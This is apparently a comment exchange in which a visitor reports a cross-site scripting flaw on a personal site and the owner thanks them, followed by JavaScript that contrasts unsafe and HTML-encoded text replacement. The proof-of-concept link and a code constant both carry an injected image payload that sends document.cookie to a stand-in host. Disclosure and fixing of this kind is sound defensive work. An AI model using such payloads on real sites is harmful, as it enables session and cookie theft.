Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC: https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

HTML-encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.
Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"
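
The fix suggested in the first comment, as an added example that is not the site's own code (the thread does not show it). It assumes each query parameter name is a word on the page and its value is the replacement text; `PAGE` and the function names are hypothetical, and the hardened version goes one step beyond the comment by also leaving markup inside tags untouched.

```javascript
// Constructed sample page; the real site's markup is not shown in the thread.
const PAGE = "<p>Posted in October by the site owner.</p>";

// Query string copied from the POC link in the first comment.
const POC_QUERY =
  "October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27" +
  "//example.com/%27%20%2B%20document.cookie;%22%20/%3E";

// Encode the five characters that can change HTML structure.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Parse "word=replacement" pairs, dropping empty words (they would match everywhere).
function parsePairs(query) {
  return [...new URLSearchParams(query)].filter(([word]) => word.length > 0);
}

// Before: the decoded value is spliced into the markup as-is, so a value
// containing a tag becomes a live element in the victim's browser.
function replaceUnsafe(html, query) {
  return parsePairs(query).reduce((out, [word, value]) => out.split(word).join(value), html);
}

// After: the value is HTML-encoded before the replacement, and only text
// between tags is rewritten so a parameter cannot rename an existing tag.
function replaceEncoded(html, query) {
  const pairs = parsePairs(query);
  return html
    .split(/(<[^>]*>)/) // odd indexes hold the tags themselves
    .map((part, i) =>
      i % 2 === 1
        ? part
        : pairs.reduce((t, [word, value]) => t.split(word).join(escapeHtml(value)), part)
    )
    .join("");
}

console.log("unsafe :", replaceUnsafe(PAGE, POC_QUERY));
console.log("encoded:", replaceEncoded(PAGE, POC_QUERY));
```
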